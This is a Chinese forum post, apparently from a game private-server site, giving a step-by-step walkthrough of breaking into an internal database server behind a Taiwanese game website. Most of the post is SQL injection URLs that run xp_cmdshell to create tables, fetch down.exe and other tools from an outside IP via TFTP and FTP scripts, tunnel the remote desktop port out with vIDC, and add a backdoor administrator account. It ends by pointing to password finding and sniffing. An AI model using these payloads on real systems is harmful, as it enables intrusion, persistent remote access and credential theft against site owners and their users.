设为首页
收藏本站
开启辅助访问
切换到宽版
登录
立即注册
只需一步,快速开始
首页
Portal
论坛
BBS
新鲜出炉
免费列表
联系我们
搜索
搜索
文章
安全
安全
统计
传奇版本
精品软件
传奇工具
水漫金山
传奇教程
福利经验
传奇技术
素材补丁
引擎帮助
网站程序
动画发布
开区工具
站点公告
传奇故事
站点版规
关于报毒
在线工具
违规处里
站点帮助
站务处理
本版
帖子
用户
传奇GM论坛
»
论坛
›
精品版本
›
微端版本
›
内网数据库服务器入侵检测
返回列表
发新帖
内网数据库服务器入侵检测
[复制链接]
341
|
0
|
2012-4-1 19:22:30
|
显示全部楼层
|
阅读模式
前言:
对付在内网而且对外不的服务器,除了反弹端口得到一个shell外,没别的好办法,Doallincmd,太麻烦,不方便我们进一步渗透内网,以下通过一个站点说明我的办法。
目标:
http://www.yunsec.net(仅用本站网址代替目标网址,实则并非本站),台湾最大的游戏综合网站,前期,web存在注入点,和数据库服务器不是同一个机器。服务器的是sql的sa权限,用nbsi2看过,是在内网,而且数据库服务器对外不开端口,web服务器只开80端口映射,我们来看看数据库服务器能不能上网。
http://xx..tw/news-game.asp?ch_id=001&newsid=2215‘createtable[xl],[xl2][varchar])—
http://xx..tw/news-game.asp?ch_id=001&newsid=2215‘insertintoxlexec%20master.dbo.xp_cmdshell%20‘ping163.com‘--
然后爆出xl1的内容,恩,这个内网的机器可以上网,一切都是这么幸运。开始传一个可以下载东西的程序过去先。是winegg的down.exe
http://xx..tw/news-game.asp?ch_id=001&newsid=2215insert%20into%20xlexec%20master.dbo.xp_cmdshell%20‘tftp-I211.78.39.64getdown.exe‘--
用xp_dirtree看看,system32下没这个文件,xl1里边也显示超时不成功,换个tftp服务器测试,还是不成功,只有用ftp了:
http://www.yunsec.net/news-game.asp?ch_id=001&newsid=2215‘exec%20master.dbo.xp_cmdshell%20‘echoopen211.78.39.64>345.txt‘--
http://www.yunsec.net/news-game.asp?ch_id=001&newsid=2215‘exec%20master.dbo.xp_cmdshell%20‘echoxxxx>>345.txt‘--
http://www.yunsec.net/news-game.asp?ch_id=001&newsid=2215‘exec%20master.dbo.xp_cmdshell%20‘echoxxxx>>345.txt‘--
http://www.yunsec.net/news-game.asp?ch_id=001&newsid=2215‘exec%20master.dbo.xp_cmdshell%20‘echogetdown.exe>>345.txt‘--
http://www.yunsec.net/news-game.asp?ch_id=001&newsid=2215‘exec%20master.dbo.xp_cmdshell%20‘echoqui>>345.txt‘--
http://www.yunsec.net/news-game.asp?ch_id=001&newsid=2215‘exec%20master.dbo.xp_cmdshell%20‘ftp-s:345.txt‘--
ok,成功。然后可以下载东西了,先下载个卡端口的fprt.exe,查看xl1,发现成功,看看他开了什么端口。
http://www.yunsec.net/news-game.asp?ch_id=001&newsid=2215‘%20insert%20into%20xl%20exec%20master.dbo.xp_cmdshell%20‘down.exe%20http://666w.com/tools/foprt.exe‘--
http://www.yunsec.net/news-game.asp?ch_id=001&newsid=2215‘%20insert%20into%20xl%20exec%20master.dbo.xp_cmdshell%20‘fport‘--
开了3389,但是显然没对外网映射,怎么办呢?我们要把他映射出来,找到了yyc写的vIDC软件,这个软件分客户端和,服务器端idc.exe在肉鸡运行,使用默认8080端口,直接在肉鸡运行就ok。客户端vIDCc.exe、vIDCc.DLL,是图形界面的,不能用,我来修改一下,加个ini文件,让他按ini文件里的自动连接绑定端口,ok,用down.exe下载到入侵的服务器,运行就已经绑定了3389了,在入侵的机器上添加管理员:
idcc.exe">http://www.yunsec.net/news-game.asp?ch_id=001&newsid=2215‘execmaster.dbo.xp_cmdshell‘vidcc.exe‘--
http://www.yunsec.net/news-game.asp?ch_id=001&newsid=2215‘execmaster.dbo.xp_cmdshell‘netuserxiaoluluaixue/add‘--
http://www.yunsec.net/news-game.asp?ch_id=001&newsid=2215‘execmaster.dbo.xp_cmdshell‘netlocalgroupadministratorsxiaolu/add‘--
Ok登陆,
进去后,看了看web服务器开了几乎所有能开的端口包括139,然后,findpass,sniffer,等等,就看你的了。
*
发帖前要善用
【
论坛搜索
】
功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
幻想
回复楼主
返回列表
图文推荐
传世1.994天元心法版,啸天虎,副本任务,珍宝阁奖励
2011-06-30
最新烟雨寒雪暴力来袭靓装四连击传奇版本,给力嚣张,傲世青龙(3K引擎)
2011-07-01
新注册会员无法接收到验证邮件问题及解决方法
2011-12-17
2011最新火爆3D真彩地图,1.96梦幻变身QQ三钻黄金皓月升级版(...
2011-06-20
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2012-03-30
热门排行
1
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2
超爽给力3D真彩韩版诸神灭佛中变版,皇冠至尊,天地归一(Her...
3
1.96紫仙刺影四钻元素轻变版,冰神皓月,黄金矿工,紫仙合成(...
4
独家四皇冠《救世主》3D真彩地图中变靓装版,终结者神地(H...
5
2012最新青龍白虎中变皇冠之神靓装版,龙神宝殿,白虎之都(H...
6
1.95龙战刺影神龙合击版,刺影之城,神龙之地,幽冥神盾(3k引擎)
7
New盟重新城暗杀来袭第八季武动乾坤,枯海神舰,斗气大陆(Ma...
8
1.76复古精品加强版,爵位封号,亡灵古墓,夺宝奇兵,精品神殿(Hero引擎)